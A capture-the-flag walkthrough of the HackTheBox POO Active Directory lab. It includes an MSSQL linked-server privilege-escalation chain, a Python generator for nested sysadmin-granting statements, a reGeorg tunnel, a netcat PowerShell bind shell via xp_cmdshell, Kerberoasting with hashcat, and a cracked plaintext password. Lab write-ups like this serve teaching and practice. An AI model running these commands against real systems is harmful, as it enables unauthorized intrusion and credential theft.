POO write-up

This is a walkthrough of the HackTheBox POO lab, an Active Directory environment reached over the lab VPN. There are five flags to collect, and the path to them runs through an IIS web server, a chain of MSSQL linked servers and Kerberos.
Flag: Recon

The lab host's address is 10.13.38.11; add it to /etc/hosts:

10.13.38.11 poo.htb
Instead of starting with nmap, sweep every TCP and UDP port with masscan over the VPN interface tun0 at 500 packets per second:
sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500
Then get service details for the ports masscan reported, using nmap with -A (version detection, default scripts, OS guess, traceroute):
nmap -A poo.htb -p80,1433
Two services: IIS on port 80 and MSSQL on port 1433. Nothing else (no DNS or other domain services) is exposed on IPv4, so there is no quick way to learn the domain name yet; we start with the web server.

Directory brute force with gobuster: 128 threads (-t), the target URL (-u), a wordlist (-w) and the extensions to append to each word (-x):
gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html
gobuster finds /admin, which asks for credentials, and a .DS_Store file in the web root. .DS_Store is the metadata file macOS Finder writes into every folder it displays; it records the names of the files and subfolders the folder contained when it was last browsed. A .DS_Store copied to a web server together with the site therefore leaks the directory tree, including paths no wordlist would guess.

A dedicated crawler parses each .DS_Store it finds, fetches every path it names and repeats recursively:
python3 dsstore_crawler.py -i http://poo.htb/
The crawl reveals a /dev directory and, below /dev/dca66d38fd916317687e1390a420c3fc/, a db folder. The file names inside it are only known in truncated form: 6 characters, the same prefix that IIS 8.3 short-name enumeration exposes. One of them begins with "poo_co", so to recover the rest of the name we take every word in the wordlist that starts with "co":
cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt
and fuzz it as poo_<word>.txt with wfuzz, hiding 404 responses:
wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404
One word matches, and the file it reveals holds MSSQL connection details: a username, a password and the DBNAME of the database to use. That is the first flag: 20% done.
Next flag
Connect to MSSQL with DBeaver using those credentials. Browsing the databases turns up nothing useful by itself, so open the SQL Editor and first list the server logins:
SELECT name FROM master..syslogins;
Several logins exist. Now check which server roles our own login holds:
SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');
None: every is_srvrolemember() call returns 0. Next, list the linked servers:
SELECT * FROM master..sysservers;
There is a linked server, COMPATIBILITYPOO_CONFIG. Queries sent through a linked server run under whatever login the link was configured with, not ours, so see what we can reach through it with openquery():
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');
and one hop further, because COMPATIBILITYPOO_CONFIG has a linked server of its own, COMPATIBILITYPOO_PUBLIC:
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');
This is the interesting part: COMPATIBILITYPOO_PUBLIC is the instance we are already connected to, so the chain loops back on itself. Each hop authenticates with the credentials stored in the link definition, so arriving home after two hops may leave us as a different, more privileged user than the one we logged in with. Check which user we are after one hop:
SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');
and after the round trip through the second hop:
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');
Now we are dbo rather than the low-privileged login we started with. Check the server roles from inside the chain:
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');
sysadmin is 1. That privilege can't be exercised through openquery() alone: openquery() expects a rowset back and is unsuitable for DDL. EXECUTE ... AT runs an arbitrary batch on a linked server and nests the same way, so we create a login of our own on the far end of the chain and make it sysadmin. Note how every level of nesting doubles the single quotes again:
EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
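Building these nested statements by hand is where mistakes happen: every hop re-escapes the whole text it wraps, so a quote at depth two is written as four quotes, and one miscount breaks the batch. The helper below is an added example (not code from the original write-up) that generates the openquery() probes and the EXECUTE ... AT statements shown above for a chain of any length, and can peel a chain back apart to check that the escaping is right. The two linked-server names are the ones found in the lab; the login, password and chain are parameters.

```python
"""Build and check nested linked-server queries for MSSQL.

Added example, not code from the original write-up. The two linked server
names are the ones the write-up found; login, password and the chain itself
are parameters, so the same helpers cover a chain of any length.
"""
import re
from typing import List, Sequence, Tuple

SERVER_ROLES = ("sysadmin", "dbcreator", "bulkadmin", "diskadmin",
                "processadmin", "serveradmin", "setupadmin", "securityadmin")


def tsql_literal(s: str) -> str:
    """Escape s for use inside a T-SQL single-quoted string literal."""
    return s.replace("'", "''")


def openquery_chain(servers: Sequence[str], inner_query: str) -> str:
    """Nest inner_query inside one openquery() per linked-server hop.

    servers is ordered outward from the instance we are connected to:
    ["COMPATIBILITYPOO_CONFIG", "COMPATIBILITYPOO_PUBLIC"] means CONFIG is
    linked from the current instance and PUBLIC is linked from CONFIG.
    Each hop re-escapes everything it wraps, so a quote that sits at depth
    n of the chain is written as 2**n consecutive single quotes.
    """
    query = inner_query
    for server in reversed(servers):
        query = f'SELECT * FROM openquery("{server}", \'{tsql_literal(query)}\')'
    return query


def execute_at_chain(servers: Sequence[str], statement: str) -> str:
    """Nest statement in EXECUTE('...') AT "server" for each hop. openquery()
    expects a rowset back; EXECUTE ... AT runs an arbitrary batch (DDL such
    as CREATE LOGIN) on the far end and nests with the same quoting rule."""
    stmt = statement
    for server in reversed(servers):
        stmt = f'EXECUTE(\'{tsql_literal(stmt)}\') AT "{server}"'
    return stmt


_WRAPPER = re.compile(r'^SELECT \* FROM openquery\("([^"]+)", \'(.*)\'\)$', re.S)


def peel_openquery(query: str) -> Tuple[str, str]:
    """Undo one openquery_chain() hop: (server, inner query with quotes
    un-doubled). Used to check that a hand-built chain is escaped right."""
    m = _WRAPPER.match(query)
    if not m:
        raise ValueError("not an openquery() wrapper: %r" % query[:40])
    return m.group(1), m.group(2).replace("''", "'")


def role_probe(roles: Sequence[str] = SERVER_ROLES) -> str:
    """The is_srvrolemember() probe from the write-up as one query; each
    column is 1 or 0 for the login the hop runs as (NULL for a bad role)."""
    return "SELECT " + ", ".join(f"is_srvrolemember('{r}')" for r in roles)


def grant_sysadmin_statements(servers: Sequence[str], login: str,
                              password: str, database: str = "master") -> List[str]:
    """Statements that create `login` on the last server of the chain and add
    it to sysadmin (plus db_owner of the current database), each wrapped for
    the full chain. login/database are identifiers and are not escaped; the
    password is a string literal and is."""
    steps = [
        f"CREATE LOGIN [{login}] WITH PASSWORD=N'{tsql_literal(password)}', "
        f"DEFAULT_DATABASE=[{database}], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF",
        f"CREATE USER [{login}] FOR LOGIN [{login}]",
        f"ALTER SERVER ROLE [sysadmin] ADD MEMBER [{login}]",
        f"ALTER ROLE [db_owner] ADD MEMBER [{login}]",
    ]
    return [execute_at_chain(servers, s) for s in steps]


if __name__ == "__main__":
    chain = ["COMPATIBILITYPOO_CONFIG", "COMPATIBILITYPOO_PUBLIC"]
    print(openquery_chain(chain, "SELECT user_name() as name"))
    print(openquery_chain(chain, role_probe()))
    for s in grant_sysadmin_statements(chain, "ralf", "ralfralf"):
        print(s)
```

With the two-server chain the output is character for character the queries and EXECUTE statements used above. For a longer chain, or when checking someone else's query, peel_openquery() applied repeatedly should return the original inner query; if it raises or returns mangled text, a quote was miscounted at that level.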
Now there is a sysadmin login of our own on the instance, and we can connect with it directly.
Next flag

Connect to MSSQL with impacket's mssqlclient:
mssqlclient.py ralf:ralfralf@poo.htb -db POO_PUBLIC
We are sysadmin, and the next flag has to be found somewhere on the host's file system. This instance has Machine Learning Services installed, so sp_execute_external_script can run Python, and the Python process reads files from the host with the service's rights. Use it to read the IIS web.config:
EXEC sp_execute_external_script
  @language = N'Python',
  @script = N'print(open(r"C:\inetpub\wwwroot\web.config").read())';
web.config contains the credentials for /admin. Log in there and collect the flag.
Nothing more is reachable over IPv4, but the host also has an IPv6 address, and on IPv6 more services are exposed. Add it to /etc/hosts:

dead:babe::1001 poo6.htb

A scan over IPv6 shows WinRM listening. Log in to it with the credentials from web.config and collect the next flag.
Flag: P00ned

The domain is intranet.poo. From the host, query every service principal name registered in it:

setspn.exe -T intranet.poo -Q */*
Besides the MSSQL service itself, two user accounts, p00_hr and p00_adm, have SPNs registered, which makes them Kerberoasting candidates: any domain user can request a service ticket for an SPN, and that ticket is encrypted with the service account's password hash, so it can be cracked offline. The request has to come from inside the domain, and our MSSQL shell can make it, but over IPv4 only ports 80 and 1433 are reachable from outside, so everything else (a reverse shell now, WinRM to the domain controller later) has to be tunneled through the web server.
The first attempt at uploading an .aspx tunnel page returned 404: IIS was serving static files, but ASP.NET was not enabled, so .aspx files were never handled. With the admin shell on the box, enable ASP.NET 4.5 in IIS (this changes the target's configuration, something a lab permits and a real engagement would need explicit authorization for):

dism /online /enable-feature /all /featurename:IIS-ASPNET45
Now tunnel.aspx, reGeorg's ASP.NET tunnel page, is served correctly. Start the reGeorg SOCKS proxy locally on port 5432, pointed at it:
python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx
Then route tools through it with proxychains: add the proxy (127.0.0.1, port 5432) to the ProxyList in /etc/proxychains.conf. From now on proxychained traffic enters the internal network through the web server.
Now, from the MSSQL session, start a netcat listener on the host that hands out PowerShell (xp_cmdshell is disabled by default and must first be switched on with sp_configure, which sysadmin allows):

xp_cmdshell 'C:\temp\nc64.exe -e powershell.exe -lvp 4321'
and connect to it through the tunnel:
proxychains rlwrap nc poo.htb 4321
In the PowerShell session, load Invoke-Kerberoast.ps1 and dump the service tickets in hashcat format:

. .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:\temp\kerb_hashes.txt' -Width 8000
type kerb_hashes.txt
Cracking: rockyou contained neither password, but the SecLists password lists did. Run hashcat in mode 13100 (Kerberos 5 TGS-REP, etype 23) against all of them:

hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force

Both passwords fall: one from dutch_passwordlist.txt, the other from Keyboard-Combinations.txt.
Now we have passwords for two domain users, and from the host we also learn the domain controller's IP address. To see what the accounts can do, use PowerView.ps1: evil-winrm's -s option takes a local directory of PowerShell scripts and lets them be loaded into the remote session by name. Then build a PSCredential for p00_adm so that PowerView queries the DC as that user:
$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass
Passing $Creds makes PowerView's queries run against the DC as p00_adm. List the domain users together with their AdminCount attribute:
Get-NetUser -DomainController dc -Credential $Creds | select name,admincount
p00_adm does not have AdminCount set, so it is not a protected admin account. What groups is it in?
Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds
Its group memberships give the account more than an ordinary user's rights on the domain controller.
So connect to the DC over WinRM with evil-winrm, run under proxychains so the connection goes through the reGeorg tunnel, using the p00_adm credentials.
Once on the domain controller, the mr3ks account is the last step, and with it the final flag is ours: 100%.

All five flags, and every one of them came from configuration rather than a software bug: a .DS_Store left on the web server, a linked-server loop that hands out a more privileged login, credentials in plaintext files, a network filtered on IPv4 but open on IPv6, and service accounts with crackable passwords. Thanks for reading.
Source: www.habr.com